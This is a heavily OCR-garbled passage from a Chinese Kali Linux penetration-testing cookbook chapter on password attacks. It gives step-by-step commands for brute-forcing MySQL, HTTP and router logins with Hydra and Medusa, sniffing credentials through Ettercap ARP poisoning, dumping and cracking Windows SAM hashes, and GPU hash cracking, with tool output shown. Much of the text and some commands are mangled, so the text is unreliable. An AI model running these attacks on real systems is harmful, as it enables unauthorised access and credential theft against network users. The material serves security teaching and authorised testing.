1. 在 开始 菜单 中 ， 选 


择 Applications | Kali Linux | Password Attacks | Online Attacks | hydra-gtk ° 





“ xHydra 








Target 
© Single Target [127.0.0.1 
C) Target List 国 b 
O Prefer IP'V6 
Port 0 HW 
Protocol afp Y 
Output Options 
[] Use SSL C Be Verbose 
[] Show Attempts [| Debug 
| hydra -| yourname -p yourpass -t 16 127.0.0.1 afp al 


既然 我 们 已 经 把 Hydra 打开 了 ， 我 们 需要 设置 我 们 的 单词 列表 。 点 击 Passwords (% 
码 ) 标签 页 。 我 们 需要 使 用 用 户 名 列表 和 均码 列表 。 输 入 你 的 用 户 名 和 均码 列表 的 位 
置 。 同 时 选择 Loop around Users (循环 使 用 用 户 名 ) 和 Try empty password (Zire SE 
码 ) 。 


o 用 户 名 列 

表 - /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/names/nameslist.txt 
o PEAD] 

表 . /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser -passwd/passwds/john. txt 


你 可 以 使 用 的 快捷 方式 是 ， 点 击 单词 列表 框 来 打开 文件 系统 窗口 。 


xHydra 


— Passwords Tuning Specific 


Username 


O Usemame |youmame 
Q Username List jwaimamesinamelist tx 


Loop around users 
Password 


O Password | yourpass 


© Password List 3 sswüd/passwds/john.txt | 


Colon separated file 


D Use Colon separated file 


[3 Try login as password Try empty password 


hydra -V -L /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/... 4 





3. 下面， 我 们 要 做 一 些 调整 。 在 Performance Options (执行 选项 ) 下 面 ， 我 们 将 任务 数量 
从 16 设置 为 2。 原 因 是 我 们 不 打算 让 这 么 多 进程 运行 ， 这 样 会 使 服务 器 崩 演 。 虽 然 它 是 
可 选 的 ， 我 们 也 希望 选择 Exit after first found pair (在 首次 发 现 匹 配 之 后 退出 ) 选 
项 o 


xHydra 


Mt 


| Target Passwords. Tuning Specific Start | 


一 = 一 一 一 一 一 一 一 一 一 =- 一- 一 一 一 -一 一 一 -= 


| Performance Options 


Number of Tasks | E 2 





Timeout |15 


Exit after first found pair 


B Use a HTTP/HTTPS Proxy 
Q No Proxy ^) HTTP Method O CONNECT Method 


























Proxy | http://127.0.0.1:8080 
C) Proxy needs authentication 
Username [yourname 
Password |yourpass 
Í hydra -v -L /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/... 4 


最 后 ， 我 们 要 设置 我 们 的 目标 。 点 击 target (目标 ) 标签 页 并 设置 我 们 的 目标 和 协议 。 
这 里 ， 我 们 使 用 Metasploitable 主机 ( 192.168.10.111 ) 的 MySQL 端口 。 


Target Passwords Tuning Specific Start 
Target 


© Single Target |192.168.10.111 
C Target List 
[1 Prefer IPV6 
Port 


Protocol 


Output Options 


[1 Use SSL 门 Be Verbose 


gj Show Attempts (1 Debug 














hydra N- -L /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/.. F 





Ea RAT aH start (开始 ) 标签 页 的 start 按钮 来 启动 攻击 。 


Target Passwords Tuning Specific | Start 


| Output 
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purpose 


IHydra (http://www.thc.org/thc-hydra) starting at 2012-08-29 07:27:17 
[DATA] 2 tasks, 1 server, 5926956 login tries (1:1907/p:3108), ~2963478 trie 
[DATA] attacking service mysal on port 3306 

[ATTEMPT] target 192.168.10.111 - login "0" - pass "" - 1 of 5926956 [child t 
[ATTEMPT] target 192.168.10.111 - login "01" - pass "" - 2 of 5926956 [child 
ATTEMPT] target 192.168.10.111 - login "02" - pass "" - 3 of 5926956 [child 
[ATTEMPT] target 192.168.10.111 - login "03" - pass "" - 4 of 5926956 [child] 


| 
[Start Stop | Save Output. | Clear Output 
hydra -V -L Ipertesuweb/wfuzziwordlisufuzzdb/wordlists-user passwd)... d| 





工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Hydra 来 对 目标 执行 字典 攻击 。Hydra 允许 我 们 指定 目标 ， 并 且 使 用 
用 户 名 和 密码 列表 。 它 会 通过 使 用 来 自 两 个 列表 的 不 同 用 户 名 和 密码 组 合 来 爆破 密码 。 


8.2 玻 解 HTTP 5 49 


这 个 秘籍 中 ， 我 们 将 要 使 用 Hydra 55 85 5x AE S ZR SX HTTP 密码 。 网 站 和 Web 应 用 的 访问 
通 第 由 用 户 名 和 给 码 组 合 来 控制 。 就 像 任何 获 码 类 型 那样 ， 用 户 通 第 会 输入 弱 人 密码 。 


准备 

需要 内 部 网 络 或 互联 网 的 链接 ， 也 需要 一 台 用 作 受 害 者 的 计算 机 。 
TRE YR 

让 我 们 开始 破解 HTTP. 3 43 o 


1， 在 开始 菜单 中 ， 选 


择 Applications | Kali Linux | Password Attacks | Online Attacks | hydra-gtk ° 





x xHydra 


Cum 


Target| Passwords Tuning Specific Start 








Target 
Q Single Target 1127.0.0.1 | 
^ Target List | 1 
C Prefer IPV6 
Port 0 


Protocol | afp |» 


Output Options 


O Use SSL [] Be Verbose 
_) Show Attempts [) Debug 
hydra -| yourname -p yourpass -t 16 127.0.0.1 afp A 


CA 
( 9& 


2. 既然 我 们 已 经 把 Hydra 打开 了 ， 我 们 需要 设置 我 们 的 单词 列表 。 点 击 Passwords 
码 ) 标签 页 。 我 们 需要 使 用 用 户 名 列表 和 均码 列表 。 输 入 你 的 用 户 名 和 窒 码 列表 的 位 
置 。 同 时 选择 Loop around Users (循环 使 用 用 户 名 ) 和 Try empty password (Zi eS 


码 ) 。 
o 用 户 名 列 


表 . /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/names/nameslist.txt 
o 密码 列 
表 . /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser -passwd/passwds/john. txt 


你 可 以 使 用 的 快捷 方式 是 ， 点 击 单词 列表 框 来 打开 文件 系统 窗口 。 


xHydra 


Username 





©) Usemame | youmame 


© Username List Iwd/names/nameli 


Loop around users 


Passwort 


O Password | yourpass 
Q Password List asswd/passwds/john.txt| 
Colon separated file 


O Use Colon separated file 


O Try login as password ‘Try empty password 


hydra -N -L /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/... A 





下 面 ， 我 们 要 做 一 些 调整 。 在 Performance Options (执行 选项 ) 下 面 ， 我 们 将 任务 数量 
从 16 设置 为 2。 原因 是 我 们 不 打算 让 这 么 多 进程 运行 ， 这 样 会 使 服务 器 前 溃 。 虽 然 它 是 
可 选 的 ， 我 们 也 希望 选择 Exit after first found pair (在 首次 发 现 匹 配 之 后 退出 ) 选 

项 o 


4. 




















He 
3 


“ xHydra 
Target Passwords Tuning Specific Start 
| Performance Options 
Number of Tasks [E : 
Timeout us | 
Exit after first found pair 
Use a HTTP/HTTPS Proxy 
Q No Proxy ^ HTTP Method © CONNECT Method 
Proxy |http://127.0.0.1:8080 | 
O Proxy needs authentication 
Username |youmame | 
Password | yourpass | 
hydra -V -L pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/... 4 
后 ， 我 们 要 设置 我 们 的 目标 。 点 击 Target (目标 ) 标签 页 并 设置 我 们 的 目标 和 协议 。 


里 ， 我 们 使 用 Metasploitable 主机 ( 192.168.10.111 ) 的 HTTP 端口 。 


Target 





O Single Target |192.168.10.111 


C) Target List | 
Ci Prefer IPV6 
Port 


Protocol 
Output Options 


[] Use SSL [] Be Verbose 


m Show Attempts [ ] Debug 





hydra -V -L /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/... 4 


5 最 后 我 们 点 击 start (开始 ) 标签 页 的 start 按钮 来 启动 攻击 。 


Target Passwords Tuning Specific Start 


Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purpose 


Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-29 07:27:17 
[DATA] 2 tasks, 1 server, 5926956 login tries (1:1907/p:3108), ~2963478 trie 
[DATA] attacking service mysql on port 3306 

[ATTEMPT] target 192.168.10.111 - login "0" - pass "" - 1 of 5926956 [child (| 
[ATTEMPT] target 192.168.10.111 - login "01" - pass "" - 2 of 5926956 [child 
[ATTEMPT] target 192.168.10.111 - login "02" - pass "" - 3 of 5926956 [child 
[ATTEMPT] target 192.168.10.111 - login "03" - pass "" - 4 of 5926956 [child 


Start | Stop | Save Output | | Clear Output | 
Start [ADD | | | 
hydra -V -L Ipertest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/. » di 





8.3 获得 路 由 访问 


这 个 秘籍 中 ， 我 们 会 使 用 Medusa 来 进行 爆破 攻击 。 


当今 ， 我 们 处 于 网 络 社会 之 中 。 随 着 联网 视频 游戏 系统 的 诞生 ， 多 数 家 庭 拥有 数 台 计算 机 ， 
并 且 小 型 业务 以 创 纪录 的 趋势 增长 。 路 由 器 也 成 为 了 网 络 连接 的 基石 。 然 而 ， 富 有 经 验 的 网 
络 管理 员 的 数量 并 没有 增长 ， 以 保护 这 些 路 由 器 ， 使 得 许多 这 种 路 由 器 易于 被 攻击 。 


准备 


需要 连接 到 互联 网 或 内 部 网 络 的 计算 机 。 也 需要 可 用 的 路 由 器 。 


RIVE WF 


1. 在 开始 菜单 中 ， 访 
ha Applications | Kali Linux | Password Attacks | Online Attacks | medusa ° 当 


Medusa 启动 后 ， 它 会 加 载 help (帮助 ) 文件 。 
w.fToofus.net] (C) JoMo-Kun / Foofus Networks «jmkgafoofus.n 


medusa: option requires an argument -- 'h' 
CRITICAL: Unknown error processing command-line options. 
ALEHI: Host intoraetion must be supplied. 


Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password] -P file 
fila] -M module [OPT] 

[TEXT] : Target hostname or IP address 
[FILE] : File containing target hostnames or IP addresses 

J [TEXT] : Username to test 

U [FILE] : File containing usernames to test 
[TEXT] ' Password to test 
[FILE] : File containing passwords to te 
[FILE | : File containing combo entries. 


St 


See README for more information. 
iria : File to append log information to 
[n/s/ns ; Additional password checks i([n] No Password, 


rnama) 
-M [TEXT] : Nama of the module to execute (without tha — e an ri 
-而 [TEXT] : Parameter to pass to the module. This can be 
mes with a 
different parameter each time and they will all be sent to the 
module [i.e. 
-mM Param] -m Param?, etc.) 
-d : Dump all known modules 
-m [NUM] : Use Tor non-default [CP port number 
5 : Enable SSL 
-0g [NUM] : Give up avter trying to connect for NUM seconds (default 3) 


-r [NUM] : Sleep NUM se -onds between retry attempts (default 3) 





2， 我 们 现在 已 选 吓 的 选项 来 云顶 Medusa 。 


medusa -M http -h 192.168.10.1 -u admin -P /usr/share/wfuzz/ wordlist/fuzzdb/wordl 
ists-user-passwd/passwds/john.txt -e ns -n 80 -F 


o -M http 允许 我 们 指定 模块 。 这 里 ， 我 们 选择 了 HTTP 模块 。 


o -h 192.168.10.1 允许 我 们 指定 主机 。 这 里 ， 我 们 选择 了 192.168.10.1 (路 由 的 IP 
地 址 ) 。 


o -u admin 允许 我 们 指定 用 户 。 这 里 我 们 选择 了 admin © 


© -P [location of password list] 允许 我 们 指定 移 码 列表 的 位 置 。 


o .e ns 人 允许 我 们 指定 额外 的 考 码 检查 。 ns 变量 允许 我 们 使 用 用 己 名 作为 移 码 ， 并 
且 使 用 空竹 码 


o -n 80 允许 我 们 指定 端口 号 码 。 这 里 我 们 选择 了 80 © 


-F 允许 我 们 在 成 功 找 到 用 户 名 饥 码 组 合 之 后 停止 爆破 。 


O 





3. Medusa 会 运行 ， 并 尝试 所 有 用 户 名 和 密码 组 合 ， 直 到 某 次 成 功 。 


工作 原理 

这 个 秘籍 中 ， M Medusa AJR E 3555 h A Ay 9€ 88 o HES AERA Ab SIL ^ — ER 
能 够 访问 路 由 器 ， 你 就 可 以 更 新 它 的 设置 ， 便 于 你 以 后 再 访问 它 ， 或 者 甚至 是 重 定 向 发 送 给 

它 的 iF 流量 来 改变 选择 的 位 置 a 


$2 
你 也 可 以 和 直接 从 命令 行 运行 Medusa » 3À 33 4E medusa TA ° 


你 也 可 以 传 入 其 它 选项 给 Medusa， 取 决 于 你 的 情况 。 细 节 请 参见 帮助 文档 ， 通 过 在 终端 窗口 
仅仅 键入 medusa 来 显示 。 


模块 类 型 
下 面 是 我 们 可 以 用 于 Medusa 的 模块 列表 : 


e AFP 

e CVS 

e FIP 

e HTTP 

e |MAP 

e MS-SQL 

e MySQL 

e NetWare 

e NNTP 

e PCAnywhere 
e Pop3 

e PostgreSQL 
e REXEC 

e RLOGIN 


e RSH 

e SMBNT 

e SMTP-AUTH 

e SMTp-VRFY 

e SNMP 

e SSHv2 

e Subversion 

e [elnet 

e VMware Authentication 
e VNC 

e Generic Wrapper 
e Web form 


A NS 
8.4 RAG AT 
这 个 秘籍 中 ， 我 们 会 学 到 如 何在 密码 攻击 之 前 分 析 密 码 。 密 码 分 析 的 目的 是 允许 我 们 通过 收 


集 目 标 机 器 、 业 务 以 及 其 它 的 信息 来 得 到 更 小 的 单词 列表 。 在 我 们 的 教程 中 ， 我 们 会 使 用 
Ettercap 和 它 的 ARP 毒化 功能 来 嗅 探 流量 。 


准备 
这 个 秘籍 需要 局 域 网 的 连接 。 
操作 步骤 


让 我 们 启动 Ettercap 来 进行 密码 分 析 。 


1. 我们 以 配置 Ettercap 来 开始 这 个 秘籍 。 首 先 ， 我 们 找到 它 的 配置 文件 并 用 VIM 编辑 它 。 


locate etter.conf 
vi /etc/etterconf 


要 注意 ， 你 的 位 置 可 能 不 同 。 
2. 将 ec uid 和 ec gid 改 为 ° 


[privs] 
ec uid Q # nobody is the default 


ac gid = | # nobody is the default 





[mitm] 


3. 下 面 我 们 需要 取消 下 面 的 IPTABLES 行 的 注释 。 它 在 靠近 文件 末尾 的 Linux 一 节 。 


L ij y Lk uS ip E aD | -_ 


di commang on = “iptables -t mat -A PREROUTING -i %ifar 


redir_command_off = “iptables -t nat -D PREROUTING -i *iface - 





4. 现在 ， 我 们 将 要 启动 Ettercap。 使 用 -6 选项 ， 加 载 图 形 化 界面 (GUI) ° 


* ettercap 0.7.4.1 


Ayr) m mur He P 
-" et E 2 = i! 





5， 我 们 开局 统一 噢 探 。 你 可 以 按 下 shift + u 或 者 访问 菜单 栏 中 
的 Sniff | Unified sniffing... ° 


* ettercap 0.7.4.1 
Options Help 
Uninied sniffing... 


Briaged sni 


Cao 


x ettercap Input 


e Network interface : 


Cancel 

















T. 下面， 我 们 开始 scan for hosts (扫描 主机 ) ， 这 可 以 通过 按 下 ctrl s 或 访问 菜单 栏 
的 Hosts | Scan for hosts 来 完成 


ettercap 0.7.4.1 





8. 现在 我 们 能 够 让 Ettercap 开始 噢 探 了 。 你 可 以 按 下 ctrl +w 或 访问 菜单 栏 
的 start | Start Sniffing (开始 噢 探 ) 。 


x ettercap 0.7.4.1 


-p eTii F ci BA | put 





9. 3/5 ^ RANA SHAT ARP #16 LIED GE Mitm | Arp poisoning (ARP X46) 。 


x ettercap 0.7.4.1 


largets Hosts View MIM 





10. 在 出 现 的 窗口 中 ， 选 中 sniff remote connections (了 嗅 探 远程 连接 ) 的 选项 。 


Optional parameters 
&j (Sniff remote connections. 
[ ] Only poison one-way. 


OK | | Cancel 





11. 取决 于 网 络 情况 ， 我 们 会 看 到 信息 。 


< ettercap 0.7.4.1 


| = | 





7587 mac vendor hingerprint 

1766 tcp OS fingerprint 

2183 known services 

Randomizing 255 hosts for scanning. 
Scanning the whole netmask for 255 hosts.. 
3 hosts added to the hosts list 

Starting Unified sniffing 


ARP poisoning victims: 
GROUP 1 : ANY (all the hosts in the list) 


GROUP 2 : ANY (all the hosts in the list) 





12. 一 旦 我 们 找到 了 我 们 想 找 的 信息 (用 户 名 和 和 密码) 。 我 们 会 关闭 Ettercap。 你 可 以 按 
下 ctrl + E 或 者 访问 菜单 栏 的 start | stop sniffing (停止 噢 探 ) 来 完成 。 


x ettercap 0.7.4.: 


i 让 
FIOSTS 


x ette rcap 0.7 8.1 





工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Ettercap 来 毒化 网 络 并 偷 取 网 络 上 的 用 户 名 和 窗 码 。 我 们 以 寻找 和 修 
改 Ettercap 的 配置 文件 来 开始 。 之 后 我 们 启动 了 Ettercap 并 使 用 ARP 毒化 执行 中 间 人 

(MITM) 攻击 。 由 于 流量 被 重 定向 到 我 们 的 主机 ， 当 用 户 名 和 狗 码 在 网 络 上 传播 时 ， 我 们 就 
能 够 看 到 它们 o 


P 


RAT MER Metasploit 来 分 析 用 户 名 和 面 。 我 们 会 通过 使 用 搜索 邮件 收集 器 模块 来 执行 


1. 打开 终端 窗口 并 启动 MSFCONSOLE : 


msfconsole 


2. 搜索 邮件 收集 器 ; 


search email collector 


irch email collector 


etcning Modules 


Name Disclosure Date Rank 


TRE lary/gather/search email collector normal 





3. 键入 下 列 命令 来 使 用 搜索 邮件 收集 器 模块 : 


use auxiliary/gather/search_email_collector 


4. 展示 该 模块 可 用 的 选项 
show options 


show /opt Lons 
Module options (auxillary/gather/search_email—eot Lecter) 
Name Current Setting Required Description 


DOMAI i yes The domain name to locate email addresses for 
ÜLTFILE no A filename to store the generated email List 
SEARCH BING true Enable Bing as a backend search engine 

SEARCH GOOGLE true Enable Google as a backend search engine 
SEARCH YAHOO true Enable Yahoo! as a backend search engine 


F m iD 
"EE UU 


LE s 
iD 


puxiliary(search email collector) > E 





5. 下 面 我 们 设置 域名 。 如 果 不 想 被 有 关 部 门 查 水 表 的 话 ， 请 小 心 选择 域名 。 
6， 将 域名 设 为 你 希望 的 域名 : 


set domain gmail.com 


7. 设置 输入 文件 。 这 并 不 是 必需 的 。 如 果 你 打算 运行 多 个 攻击 ， 或 打算 稍 后 也 能 运行 某 个 
攻击 ， 推 荐 设置 它 


x 
Oo 


set outfile /root/Desktop/fromwillie.txt 


msf auxiliary| ) » set domain gmail.com 

domain => gmail.co 

msi PASAYA ) > set outfile /root/Desktop/fromwillie.txt 
p/fromwillie.txt 


k LI 
_ 





8.5 使 用 John the Ripper 破解 Windows 密码 


这 个 秘籍 中 ， 我 们 会 使 用 John the Ripper 来 破解 Windows 安全 访问 管理 器 (SAM) 文件 。 
SAM 文 件 储存 了 目标 系统 用 户 的 用 户 名 和 宅 码 的 哈 希 。 出 于 安全 因素 ，SAM 文 件 使 用 授权 来 
保护 ， 并 且 不 能 在 Windows 系统 运行 中 直接 手动 打开 或 复制 。 


准备 
你 将 会 需要 访问 SAM 文件 。 
这 个 秘籍 中 ， 我 们 假设 你 能 够 访问 某 台 Windows 主机 。 
TRE y HR 
让 我 们 开始 使 用 John the Ripper 破解 Windows SAM 文件 。 我 们 假设 你 能 够 访问 某 


Windows 主机 ， 通 过 远程 入 侵 ， 或 者 物理 接触 ， 并 且 能 够 通过 USB 或 DVD 驱动 器 
Linux ° 


和 
ua 
启动 Kali 


1， 看 看 你 想 挂 载 哪个 硬盘 : 


Fdisk -1 


o 


2. ARBAA c JEEP target RA CHER MS 
mount /dev/sdai /target/ 


3. 将 目录 改 为 Windows SAM 文件 的 位 置 


cd /target/windows/system32/config 


4 列 出 目录 中 所 有 内 容 。 


ls -al 


5. 使 用 SamDump2 来 提取 哈 希 ， 并 将 文件 放 到 你 的 root 用 户 目录 中 的 一 个 叫做 hashes 的 
文件 夹 中 。 


samdump2 system SAM > /root/hashes/hash.txt 
6. JB XA John the Ripper 所 在 目录 。 
7. 运行 John the Ripper : 


./john /root/hashes/hash.txt 
./john /root/hashes/hash.txt-f:nt (If attacking a file on a NTFS System) 


8.6 字典 攻击 


这 个 秘籍 中 ， 我 们 会 


进行 字典 或 单词 列表 的 攻击 。 字 典 攻击 使 用 事先 准备 的 密码 集合 ， 并 演 
试 使 用 单词 列表 爆破 与 指定 用 


户 匹 配 的 均码 。 所 生成 的 字典 通 第 由 三 种 类 型 : 


E TT e aa a 
+ ”只 有 密码 : PURA BUR BAe 
+ ”用 户 名 和 密码 : 列表 含有 生成 的 用 户 名 和 密码 。 


出 于 演示 目的 ， 我 们 使 用 Crucnch 来 生成 我 们 自己 的 密码 字典 。 
准备 
需要 在 Kali 上 安装 Crunch 。 


操作 步骤 


Kali 的 好 处 是 已 经 安装 了 Crunch， 不 像 BackTrack ° 


1 打开 终端 窗口 ， 并 输入 crunch 命令 来 查看 Crunch 的 帮助 文件 。 


crunch 


| :=# crunch 
crunch version 3.4 


SPUNEA can create a wordlist based on criteria you specify. The outout from cru 
can be sent to the screen, file, or to anot har program. 


crunch «min» «me [options] 
min and max are te 


S 


er to the man page for instructions and examples on how to use crunch. 


-# 国 
2. 使 用 Crunch Æ s 3 43 89 X AGE 


是 ， [minimum length] [maximum length] [character set] [options] ° 





3. Crunch 拥有 几 种 备 选 选项 。 一 些 第 用 的 如 下 
o -o :这 个 选项 允许 你 指定 输出 列表 的 文件 名 称 和 位 置 、 


o -b :这 个 选项 允许 你 指定 每 个 文件 的 最 大 字 节 数 。 大 小 可 以 以 KB/MB/GB 来 指 
定 ， 并 且 必 须 和 -o START 触发 器 一 起 使 用 。 


o -t :这 个 选项 允许 你 指定 所 使 用 的 模式 。 


o -1 :在 使 用 -t 选项 时 ， 这 个 选项 允许 你 将 一 些 字 符 标识 为 占 位 符 
E» p- 
4. FORNATPORER OLAS RAIA? Xx 84 X8 c Xx X 10 个 字符 ， 并 且 使 


用 字符 集 ABCDEFGabcdefg0123456789 ° 


crunch 8 10 ABCDEFGabcdefg0123456789 -0 /root/Desktop/ generatedCrunch.txt 


:=# crunch B 10 ABCDEFGabcde fg81234 295/89 -o /root/Desktop/generatedCrunch.txt 
.Funch will now generate the following amount oT data: /z24B459438485650 bytes 
591266960 MB 


575065 GB ll 





.runch will now generate the following number of lines: 


5 一 旦 生成 了 文件 ， 我 们 使 用 Nano 来 打开 文件 : 


nano /root/Desktop/generatedCrunch. txt 


工作 原理 


这 个 秘籍 中 我 们 使 用 了 Crunch 来 生成 密码 字典 列表 。 


8.7 使 用 彩虹 衣 


这 个 秘籍 中 我 们 会 学 到 如 何在 Kali 中 使 用 彩虹 表 。 彩 虹 表 是 特殊 字典 表 ， 它 使 用 哈 希 值 代 替 
了 标准 的 字典 寅 码 来 完成 攻击 。 出 于 演示 目的 ， 我 们 使 用 RainbowCrack 来 生成 彩虹 表 。 


TRE Sy HR 
1. 打开 终端 窗口 并 将 目录 改 为 rtgen 的 目录 : 


cd /usr/share/rainbowcrack/ 


Zo d Cd /Usr/share/rainbowe rack 


*/usr/share/ralnbowt rack? li 





2. FARZ x rtgen 来 生成 基于 MD5 的 彩虹 表 。 


./rtgen md5 loweralpha-numeric 1 5 0 3800 33554432 0 


:/usr/share/rainbowcrack& ./rtgen md5 loweralpha-numeric 1 9 3800 335 


j£ U.rt parameters 
hash | atodi thm: peg 
hash length: 16 
charset: cu gh galicia Caelum 
92 63 64 65 66 5/ 68 69 ba 6b bc bd be bf /0 / 


charset Length : 


plaintext Length 
reduce offset: 


plaintext total: 





3. 一 旦 彩虹 表 生 成 完毕 d 你 的 目 录 会 包含 t 文件 。 这 取决 于 用 于 生成 哈 希 的 处 理 器 数 
量 ， 大 约 需 要 2-7 个 小 时 。 


4. A T HRR o RAER rtsort F/R AH Be RE 其 更 加 易于 使 用 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 了 RainbowCrack 攻击 来 生成 、 排 序 和 破解 MD5 密码 。 
RainbowCrack 能 够 使 用 彩虹 表 破 解 哈 希 ， 基 于 一 些 预 先 准备 的 哈 希 值 。 我 们 以 使 用 小 写字 
值 生 成 MD5 彩虹 表 来 开始 。 在 秘籍 的 末尾 ， 我 们 成 功 创建 了 彩虹 表 ， 并 使 用 它 来 破解 哈 布 
件 。 


H 
pa 


A `S > +) AE 、 

8.8 使 用 英 伟 达 统 一 计算 设备 架构 (CUDA) 

这 个 秘籍 中 ， 我 们 会 使 用 英 伟 达 统 一 计算 设备 架构 (CUDA) 来 破解 密码 哈 希 。CUDA 是 一 个 
并 行 计算 平台 ， 它 通过 利用 GPU 的 能 力 来 提升 计算 性 能 。 随 着 时 间 的 流逝 ，GPU 的 处 理 能 


力 有 了 戏剧 性 的 提升 ， 这 让 我 们 能 够 将 它 用 于 计算 目的 。 出 于 演示 目的 ， 我 们 使 用 
CudaHashcat-plus 来 破解 密码 。 


准备 
需要 CUDA 所 支持 的 显卡 来 完成 这 个 秘籍 。 
TRE Sy HR 
1， 打 开 终 端 窗口 并 将 目录 改 为 OclHashcat-plus 所 在 目录 。 


cd /usr/share/oclhashcat-plus 


udaHa it-p i example.dict 
example .hash hashcat .hcstat 


example4008.hash kernels 
example5008,hash | 


" I | Pe 
oc Lia hi 1 DELETE: H 





2， 执 行 下 列 命令 来 启动 CudaHashcat-plus 的 帮助 文件 : 


./cudaHashcat-plus.bin -help 


3. 3447 CudaHashcat 的 语法 是 cudaHashcat-plus.bin [options] hash [mask] ° 
使 用 OclHashcat 的 重点 之 一 是 理解 它 的 字符 集结 构 。 


4. 在 我 们 开始 攻击 之 前 ， 让 我 们 先 看 看 一 些 可 用 的 攻击 向 量 。CudaHashcat 在 攻击 中 使 用 
左右 掩 码 。 密 码 的 字符 按照 掩 码 划分 ， 并 且 被 均 分 为 左 和 右 掩 码 。 对 于 每 个 掩 码 ， 你 可 
以 为 其 指定 字典 或 字符 集 。 出 于 我 们 的 目的 ， 我 们 会 使 用 定制 的 字符 集 。 


5. 为 了 指定 自 定 义 字 符 集 ， 我 们 使 用 -1 选项 。 我 们 可 以 设置 任意 多 的 自足 义 字符 集 ， 只 要 
为 它们 指定 一 个 数值 ( 1-n ) 。 每 个 自 定 义 字 符 都 由 问号 ( ? ) 来 表示 ， 并 且 随 后 是 字 
符 类 型 。 可 用 的 选择 是 : 


o d 指定 数字 (0-9) 

1 指定 小 写字 母 

O u 间 定 大写 字母 

s 指定 特殊 字符 

o 1-n 指定 用 做 占 位 符 的 自 定 义 字 符 集 。 


O 


O 


NA 


这 样 将 它们 组 合 起 来 ， 我 们 就 指定 了 一 个 自 定 义 字 符 集 ， 它 包括 特殊 字符 ( s) ， 大 写 
字母 ( u ) ， 小 写字 母 ( 1 ) 和 数字 (a) ， 生 成 长 度 为 8 的 密码 。 我 们 打算 指定 叫 
做 attackfile 的 哈 硕 表 。 


6. 


./cudaHashcat-plus.bin attackfile -1 ?1?u?d?s ?1?1?1?1 ?1?1?1?1 


7， 我 们 可 以 将 这 个 命令 这 样 拆 分 : 
o ./cudaHashcat-plus.bin 74] f CudaHashcat » 
o attackfile 是 我 们 的 攻击 文件 。 


o -1 ?1?u?d? 指定 了 自 定义 字符 集 1 ， 它 包含 小 写字 母 、 大 写字 母 、 数 字 和 特殊 字 
符 。 


o 21?1?1?1 有 是 使 用 字符 集 1 的 左 掩 码 。 
o 21?1?1?1 有 是 使 用 字符 集 1 的 右 掩 码 。 


这 就 结束 了 。 


8.9 使 用 ATI Stream 


这 个 秘籍 中 ， 我 们 会 使 用 ATI Stream 来 破解 密码 哈 布 。ATI Stream 类 似 于 CUDA， 因 为 它 是 
一 个 并 行 计算 平台 ， 它 可 以 通过 利用 GPU 的 能 力 来 提升 计算 性 能 。 随 着 时 间 的 流逝 ，GPU 
的 处 理 能 力 有 了 戏剧 性 的 提升 ， 这 让 我 们 能 够 将 它 用 于 计算 目的 。 出 于 演示 目的 ， 我 们 使 用 
OclHashcat-plus 来 破解 密码 。OclHashcat 有 两 种 版 本 : plus 和 lite ° AAR EAE Kali 中 。 


准备 
需要 支持 ATI Stream 的 显卡 来 完成 这 个 秘籍 。 
TRE y HR 


让 我 们 开始 使 用 OclHashcat-plus ° 


1， 打 开 终 端 窗口 并 将 目录 改 为 OclHashcat-plus 所 在 目录 。 


cd /usr/share/oclhashcat-plus 


example .hash 


example400.hash 
example5008,hash 


j L 
5 FÜ WE hh 有 T} 





2， 执 行 下 列 命令 来 启动 OclHashcat-plus 的 帮助 文件 : 


./oclHashcat-plus.bin -help 


3. 运行 OclHashcat 的 语法 是 oclHashcat-plus.bin [options] hash [mask] ° 
T 


使 用 OclHashcat 的 重点 之 一 是 理解 它 的 字符 集结 


4. 在 我 们 开始 攻击 之 前 ， 让 我 们 先 看 看 一 些 可 用 的 攻击 向 量 。OclHashcat 在 攻击 中 使 用 左 
右 掩 码 。 密 码 的 字符 按照 掩 码 划分 ， 并 且 被 均 分 为 左 和 右 掩 码 。 对 于 每 个 掩 码 ， 你 可 以 
为 其 指定 字典 或 字符 集 。 出 于 我 们 的 目的 ， 我 们 会 使 用 定制 的 字符 集 。 

5. 为 了 指定 自 定义 字符 集 ， 我 们 使 用 -1 选项 。 我 们 可 以 设置 任意 多 的 自 定 义 字符 集 ， 只 要 
为 它们 指定 一 个 数值 ( 1-n ) 。 每 个 自 定义 字符 都 由 问号 ( ? ) 来 表示 ， 并 且 随 后 是 字 
符 类 型 。 可 用 的 选择 是 : 

o d 指定 数字 (0-9) 

o 1 指定 小 写字 母 

o gu 指定 大 写字 母 

o s 指定 特殊 字符 

o d-n 指定 用 做 占 位 符 的 自 定义 字符 集 。 

6. 这样 将 它们 组 合 起 来 ， 我 们 就 指定 了 一 个 自 定义 字符 集 ， 它 包括 特殊 字符 ( s) XS 
字母 ( u ) ， 小 写字 母 (1) 和 数字 (a) ， 生 成 长 度 为 8 的 密码 。 我 们 打算 指定 中 
做 attackfile 的 哈 而 表 


./oclHashcat-plus.bin attackfile -1 ?1?u?d?s ?1?1?1?1 ?1?1?1?1 


7. 我 们 可 以 将 这 个 命令 这 样 拆 分 : 
© ./oclHashcat-plus.bin 调用 了 OclHashcat » 
o attackfile 古 我 们 的 攻击 文件 。 


o -1 ?1?u?d? 指定 了 自 定义 字符 集 1 ， 它 包含 小 写字 母 、 大 写字 母 、 数 字 和 特殊 字 
符 。 


o 21?1?1?1 是 使 用 字符 集 1 的 左 掩 码 。 
o 21?1?1?1 有 是 使 用 字符 集 1 的 右 掩 码 。 


这 就 结 来 了 。 


8.10 物理 访问 攻击 


